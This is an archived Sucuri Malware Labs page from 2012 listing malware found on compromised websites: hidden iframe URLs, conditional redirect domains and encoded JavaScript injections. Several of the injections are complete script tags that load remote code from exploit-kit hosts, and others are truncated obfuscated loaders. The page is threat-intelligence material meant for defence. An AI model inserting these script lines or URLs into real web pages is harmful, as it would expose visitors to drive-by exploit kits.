Sucuri Malware Labs

Historic malware entries for 2012-07-10Home | Notes | Malware data | Signatures | Tools | About

Archived data: Latest | 2013-05-19 | 2013-05-15 | 2013-05-14 | 2013-05-13 | 2013-05-12 | 2013-05-07 | 2013-05-02 | 2013-05-01 | More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infected	Type	Malware / Domains
5474	iframe	http://poseyhumane.org/stats.php
219	iframe	http://goldensmagnetic.com/in.cgi?16
185	iframe	http://opticmoxie.com/detailPages/stats.php
167	iframe	http://flipsphere.ru/in.cgi?16
102	iframe	http://scriptslimit.info/in.cgi?16
82	iframe	http://oxsanasiberians.com/downloads/stats.php
36	iframe	http://cabaniaseleden.com.ar/stats.php
33	iframe	http://31.184.242.81/link.php
24	iframe	http://sochi-led.ru/go.php?sid=1
19	iframe	http://creativeironart.net/images/stats.php
18	iframe	http://pahgawks.com/download/stats.php
12	iframe	http://allsecureinfo.com/in.cgi?16
11	iframe	http://ineed.co.nz/adverts/media.php
10	iframe	http://synga.ru/wp-content/
10	iframe	http://grabmale-junkert.de/c.php
8	iframe	http://smuss.net/redirect.php
8	iframe	http://faintsynthesized.info/prime.php?stream=86c52cce6104cd34
7	iframe	http://pairedpixels.com/vaca/stats.php
6	iframe	http://buzzcluster.ru/in.cgi?16
5	iframe	http://minigametight.in/in.cgi?7
4	iframe	http://clients.bluecava.com/data?p=D440F31E-EDE7-4BB2-B328-527A10AB7572
3	iframe	http://hqwrestling.altervista.org/469-2/
3	iframe	http://google-adsens.com/in.cgi?2
2	iframe	http://p3d.in/e/Jexuc/wireonshadeless+spin/
2	iframe	http://insurancetop.ru/in.cgi?16
2	iframe	http://d.serve-sys.com/w/1.0/rc?cs=4fc74c47d3cb7
2	iframe	http://d.serve-sys.com/w/1.0/jstag
2	iframe	http://d.serve-sys.com/w/1.0/ai?auid=219139
2	iframe	http://d.serve-sys.com/w/1.0/afr?auid=219139
2	iframe	http://d1206.hizliresim.com/y/4/7frm5.jpg
2	iframe	http://bronzesage.ru/in.cgi?16
2	iframe	http://bigdeal777.com/gate.php?f=989035
1	iframe	http://statik.hddizifilm.com/resimler/4757-katil-kopekbaligi-3d-turkce-altyazi-izle-hd-720p-net...
1	iframe	http://sluxxqqgykewolmoli.in/in.cgi?default
1	iframe	http://google-adsenc.com/in.cgi?2
1	iframe	http://69.16.188.118/x9z7i7v3/cds/oldimg/posters/165/The_Lord_of_the_Rings_The_Two_Towers_5d699...
		Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infected	Type	Malware / Domains
499	redirections	http://reltimes2013.ru/tujur?11
121	redirections	http://onestopchinasource.com/catalog/stats.php
97	redirections	http://reltimes2013.ru/tujur?11
46	redirections	http://micristar.com/stats.php
46	redirections	http://flipsphere.ru/in.cgi?16
38	redirections	http://goldensmagnetic.com/in.cgi?16
36	redirections	http://bronzesage.ru/in.cgi?16
36	redirections	http://broadway.bee.pl/
32	redirections	http://vlagskiper.ru/yazik?12
32	redirections	http://scriptslimit.info/in.cgi?16
20	redirections	http://onmouseup.info/stats.php
15	redirections	http://pairedpixels.com/vaca/stats.php
15	redirections	http://mediciron.ru/
15	redirections	http://heartofpole.net/xml.php
12	redirections	http://banjopestpatrol.in/in.cgi?13
11	redirections	http://daliachuqimaysa.ru/gluce/index.php
10	redirections	http://www.localwebgeek.com/wp-feeds.php
10	redirections	http://huletydyshish.ru:8080/forum/showthread.php?page=beb2436a164c6222
10	redirections	http://goldensmagnetic.com/in.cgi?16
10	redirections	http://flipsphere.ru/in.cgi?16
9	redirections	http://broadway.bee.pl/
8	redirections	http://www.couchtarts.com/media.php
8	redirections	http://charityairsupport.org
7	redirections	http://www.online-open.com/
7	redirections	http://creativeironart.net/images/stats.php
7	redirections	http://bronzesage.ru/in.cgi?16
6	redirections	http://wwww.888-move-stuff.com/main.php?page=3081100e9fdaf127
6	redirections	http://vlagskiper.ru/yazik?12
6	redirections	http://scriptslimit.info/in.cgi?16
6	redirections	http://reltime2011.ru/frunleh?9
6	redirections	http://duygumatbaa.com/stats.php
6	redirections	http://cabaniaseleden.com.ar/stats.php
5	redirections	http://tvoya-security.in/puma/index.php
5	redirections	http://search-box.in/in.cgi?4
5	redirections	http://kpoita.bee.pl/
5	redirections	http://fida-talos.ru/maver?12
5	redirections	http://buzzique.ru/in.cgi?16
4	redirections	http://reltime-2013.ru/tujur?11
4	redirections	http://pgeg.ru/ywqpog?8
4	redirections	http://pairedpixels.com/vaca/stats.php
		Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infected	Type	Malware / Domains
154	javascript	<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prot...
103	javascript	<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf...
69	javascript	<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
53	javascript	<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
36	javascript	<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61...
35	javascript	<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-014/6;try{prot...
34	javascript	<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-014/6;try{prot...
26	javascript	<script type="text/javascript">var ipbs='79a5da2e';eval(function(p,a,c,k,e,d){e=function(c){ret...
24	javascript	<script type='text/javascript' src='http://danaid.org/wp-content/plugins/custom-menu/js/script....
22	javascript	<script src="http://mani36anmod.rr.nu/pmg.php?d=x"></script>
21	javascript	<script>i=0;try{prototype-5;}catch(z){fr="fromCharCode";f=[9,18,105,204,32,80,100,222,99,234,10...
20	javascript	<script src="http://mvuln99erabl.rr.nu/pmg.php?d=x"></script>
20	javascript	<script src="http://cco70con.rr.nu/pmg.php?d=x"></script>
19	javascript	<script src="http://hmarks91suspici.rr.nu/pmg.php?d=x"></script>
18	javascript	<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype...
18	javascript	<script src="http://tsruno44ffstru.rr.nu/pmg.php?d=x"></script>
18	javascript	<script src="http://iously61announ.rr.nu/pmg.php?d=x"></script>
17	javascript	<script src="http://urnal23istca.rr.nu/pmg.php?d=x"></script>
16	javascript	<script>try{prototype%2;}catch(asd){x=2;} i=0;try{prototype*5;}catch(z){fr="fromChar";f=[72,81,...
16	javascript	<script src="http://smo13tiv.rr.nu/pmg.php?d=x"></script>
16	javascript	<script src="http://mandel22iveries.rr.nu/pmg.php?d=x"></script>
16	javascript	<script src="http://erhapp86eningco.rr.nu/pmg.php?d=x"></script>
15	javascript	<script>try{prototype%2;}catch(asd){x=2;} i=0;try{prototype*5;}catch(z){fr="fromChar";f=[72,81,...
15	javascript	<script src="http://olo51gysu.rr.nu/pmg.php?d=x"></script>
15	javascript	<script src="http://hadowp04ercept.rr.nu/pmg.php?d=x"></script>
15	javascript	<script src="http://cessio33noutst.rr.nu/pmg.php?d=x"></script>
15	javascript	<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
14	javascript	<script src="ui/development-bundle/ui/jquery.ui.widget.js"></script>
14	javascript	<script src="http://ttot87allyp.rr.nu/pmg.php?d=x"></script>
14	javascript	<script src="http://rthea13terbre.rr.nu/pmg.php?d=x"></script>
14	javascript	<script src="http://posit32ionrad.rr.nu/pmg.php?d=x"></script>
14	javascript	<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
14	javascript	<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
13	javascript	<script src="http://act57ive.rr.nu/pmg.php?d=x"></script>
12	javascript	<script type="text/javascript" src="http://jsfeedget.com/js.php"></script>
12	javascript	<script type="text/javascript" language="javascript" src="http://www.corbrookpackaging.com//js/...
12	javascript	<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-014/6;try{prot...
12	javascript	<script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>
12	javascript	<script language="javascript" src="http://www.777seo.com/pop.php?username=rmx2012&max=1"></script>
12	javascript	<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
		Limited view (40 rows)... Only the top entries being displayed.